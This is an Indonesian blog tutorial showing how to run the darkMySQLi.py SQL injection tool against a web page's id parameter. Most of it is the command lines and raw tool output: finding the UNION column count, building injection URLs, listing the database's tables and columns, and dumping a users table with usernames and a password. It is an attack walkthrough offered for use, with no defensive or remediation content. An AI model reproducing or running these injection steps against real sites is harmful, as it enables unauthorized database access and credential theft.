Home » Tutorial » SQLi Menggunakan darkMySQLi.py

SQLi Menggunakan darkMySQLi.py

in - on Mei 29, 2011 - Tidak Ada Komentar


Alhamdulillah, akhirnya bisa nulis lagi. setelah beberapa bulan beristirahat dari aktivas blogging. :) Disini saya akan melanjutkan artikel saya tentang SQLi Menggunakan darkMySQLi.py, Langsung aja, saya ke prakteknya. kalau teman-teman mau tahu banyak tentang darkMySQLi.py silahkan searching sendiri. OK, Let's go...

Siapkan peralatannya,
- Install bahasa pemrograman phyton
- Siapkan darkMySQLi.py
- Buka Terminal/CMD

C:\>darkMySQLi.py –u “http://192.168.2.10/news/popup_news.php?id=22" --findcol
|-------------------------------------------------- | 
| rsauron@gmail.com v1.6                            | 
| 1/2009 darkMySQLi.py                              |
| Multi Purpose MySQL Injection Tool                |
| Usage: darkMySQLi.py [options]                    |
| -h help darkc0de.com                              |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22 [+] 06:28:14 
[+] Evasion: + -- 
[+] Cookie: None 
[+] SSL: No 
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1) 
[+] Building Proxy List... Proxy: 192.168.2.2:8080 - Success 
+] Proxy List Complete [+] Attempting To find the number of columns... 
[+] Testing: 1, 2,3,4,5,6,7,8,9,10, 
[+] Column Length is: 10 
[+] Found null column at column #: 3,4,7,8, 
[!] SQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,3,4,5,6,7,8,9,10-- 
[!] darkMySQLi URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10-- 
[-] 06:28:23 
[-] Total URL Requests: 10 
[-] Done Don't forget to check darkMySQLi.log
C:\>darkMySQLi.py -u “http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1, 2, darkc0de, darkc0de, 5, 6, darkc0de, darkc0de, 9, 10--" --full
|-------------------------------------------------- | 
| rsauron@gmail.com v1.6                            | 
| 1/2009 darkMySQLi.py                              |
| Multi Purpose MySQL Injection Tool                |
| Usage: darkMySQLi.py [options]                    |
| -h help darkc0de.com                              |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10 
[+] 06:29:13 
[+] Evasion: + -- 
[+] Cookie: None 
[+] SSL: No 
[+] Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1) 
[+] Building Proxy List... 
    Proxy: 192.168.2.2:8080 - Success 
[+] Proxy List Complete 
[+] Gathering MySQL Server Configuration... 
    Database: dbtraffic 
User: johncrackernet@www.crackernet.org 
Version: 5.0.45-log 
[+] Starting full SQLi information_schema enumeration... 
[+] Number of Rows: 270 
[Database]: dbtraffic 
[Table: Columns] 
[1]TRA_REG: id,tra_name,tra_lastname,tra_address,tra_passport,tra_state 
[2]TRA_Events: events_id, events_title, events_url, events_desc, events_sched, events_status
[3]TRA_code: code,item,adl,ingred 
[4]banner_ach: id,id_uname,image,impressions,clicks,url 
[5]cal_file: id,page_main,filename,code 
[6]cal_msg: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email 
[7]cal_msg_backup: id,uid,m,d,y,start_time,end_time,title,text,id_text,apprro,website,email 
[8]cal_name: id,name [9]cal_users: uid,username,password,fname,lname,userlevel,email 
[10]cal_memo: id,memo 

[-] 06:35:12 
[-] Total URL Requests: 25 
[-] Done
C:\>darkMySQLi.py –u "http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1, 2, dark0de, darkc0de, 5, 6, darkc0de, darkc0de, 9, 10--" --dump -D dbtraffic -T cal_users -C uid,username,password,fname,lname,userlevel, email
|-------------------------------------------------- | 
| rsauron@gmail.com v1.6                            | 
| 1/2009 darkMySQLi.py                              |
| Multi Purpose MySQL Injection Tool                |
| Usage: darkMySQLi.py [options]                    |
| -h help darkc0de.com                              |
|-------------------------------------------------- |
[+] URL: http://192.168.2.10/news/popup_news.php?id=22+AND+1=2+UNION+SELECT+1,2,darkc0de,darkc0de,5,6,darkc0de,darkc0de,9,10 
[+] 07:00:41 
[+] Evasion: + -- 
[+] Cookie: None 
[+] SSL: No 
[+] Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0) 
[+] Building Proxy List... 
    Proxy: 192.168.2.2:8080 - Success 
[+] Proxy List Complete 
[+] Gathering MySQL Server Configuration... 
    Database: dbtraffic 
    User: johncrackernet@www.crackernet.org 
    Version: 5.0.45-log 
[+] Dumping data from database "dbtraffic" Table "cal_users" 
[+] and Column(s) ['uid', 'username', 'password', 'fname', 'lname', 'userlevel', 'email'] 
[+] Number of Rows: 1 

[1] 1:admin:password:default:user:2: 
[-] 07:00:44 
[-] Total URL Requests: 3 
[-] Done
    Category

    Posting Komentar